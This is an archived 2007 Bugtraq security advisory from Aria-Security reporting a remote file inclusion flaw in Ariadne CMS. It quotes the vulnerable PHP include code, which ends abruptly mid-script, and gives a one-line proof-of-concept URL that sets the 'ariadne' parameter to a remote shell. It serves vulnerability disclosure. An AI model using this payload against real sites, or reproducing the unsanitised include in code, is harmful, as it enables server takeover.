lists.openwall.net   lists  /  announce  john-users  owl-users  popa3d-users  /  xvendor  oss-security  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4 
Open Source and information security mailing list archives
 
Order Openwall GNU/*/Linux 2.0 on a CD with delivery worldwide
[<prev] [next>] [month] [year] [list]
Date: 6 Aug 2007 21:41:32 -0000
From: Advisory@...a-security.net
To: bugtraq@...urityfocus.com
Subject: Ariadne CMS Remote File Inclusion

_________________________

A R I A - S E C U R I T Y
_________________________

Ariadne CMS Remote File Inclusion
Vendor: http://www.ariadne-cms.org/


Source Code:


<?php
  require("./ariadne.inc");
  require($ariadne."/configs/ariadne.phtml");

  $PATH_INFO = $HTTP_SERVER_VARS["PATH_INFO"];
?>
<html>
<head>
  <script>
    function LoadingDone() {
parent.LoadingDone();
}


PoC:
http://site.com/path/view.php?ariadne=SHELL?





Credits: Aria-Security Team
http://Aria-Security.net
http://outlaw.aria-security.info

Hosted by DataForce ISP - Powered by Openwall GNU/*/Linux